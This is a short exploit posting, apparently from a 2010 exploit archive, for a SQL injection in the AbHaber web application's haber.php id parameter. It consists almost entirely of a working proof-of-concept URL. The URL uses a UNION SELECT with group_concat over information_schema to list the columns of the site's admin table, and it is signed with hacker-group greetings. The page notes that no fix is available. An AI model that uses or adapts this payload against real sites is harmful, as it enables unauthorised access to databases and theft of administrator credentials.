AbHaber (haber.php id) SQL Injection Vulnerability

2010-05-14 20:02:02

#################################################################
# a4security.blogspot.com | www.1923Turk.Com
############################A4###################################
A information;
4 Name: AbHaber (haber.php?id=) SQL Injection Vulnerability
# Auth0r: Attack3r
#################################################################
A Vulnerability Info;
4 Type: Sql injection Vulnerability
# Risk: Medium
############################A4###################################
[Exploit] :

http://Attack3r/haber.php?id=[Sql]

[p0c] :

http://Attack3r/haber.php?id=-24959+union+select+1,2,group_concat%280x3a3c68723e3c62353e,column_name%29,4,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e
#############################A4##################################
A
4 Republic Of Turkey
# Attack3r
#############################A4##################################
#Greetz;
#HaCkSpY, Black-Wolf,

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.